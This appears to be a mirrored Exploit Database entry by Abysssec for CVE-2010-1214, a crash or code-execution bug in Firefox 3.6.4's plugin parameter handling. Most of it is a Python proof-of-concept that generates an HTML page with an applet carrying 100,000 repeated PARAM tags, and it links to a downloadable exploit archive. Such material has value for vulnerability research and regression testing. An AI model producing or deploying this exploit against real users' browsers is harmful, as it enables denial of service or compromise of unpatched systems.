Mozilla Firefox 3.6.4 – ‘Plugin’ EnsureCachedAttrParamArrays Remote Code Execution

• Exploit Database
• 10 阅读

• 作者： Abysssec
  日期： 2010-09-17
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15027/

• '''
  ________ __ ____
   |\/|/ __ \ /\| || |_ \ 
   | \/ | || | /\ | || | |_) |
   | |\/| | || |/ /\ \| || |_ < 
   | || | |__| / ____ \ |__| | |_) |
   |_||_|\____/_/\_\____/|____/ 
  
  http://www.exploit-db.com/moaub-17-firefox-plugin-parameter-ensurecachedattrparamarrays-remote-code-execution/
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34358.zip (moaub-17-exploit.zip)
  '''
  '''
  Title:Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution
  Version:Firefox 3.6.4
  Analysis :http://www.abysssec.com
  Vendor :http://www.mozilla.com
  Impact :Critical
  Contact:shahin [at] abysssec.com , info[at] abysssec.com
  Twitter:@abysssec
  CVE:CVE-2010-1214
  
  '''
  
  import sys;
  
  myStyle = """
  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  <html xmlns="http://www.w3.org/1999/xhtml">
  <head>
  <title>page demonstration</title>
  <link rel="stylesheet" type="text/css" href="https://www.exploit-db.com/exploits/15027/style2.css" />
  
  
  </head>
  <body id='msg'>
  
  
  <applet code = 'appletComponentArch.DynamicTreeApplet' archive = 'DynamicTreeDemo.jar', width = 300, height = 300 >
  
  """
  i=0
  while(i<100000):
  myStyle = myStyle + "<PARAM name='snd' value='Hello.au|Welcome.au'>\n";
  i=i+1
  
  myStyle = myStyle + """
  	</applet>
  
  </body>
  </html>
  """
  cssFile = open("Abysssec.html","w")
  cssFile.write(myStyle)
  cssFile.close()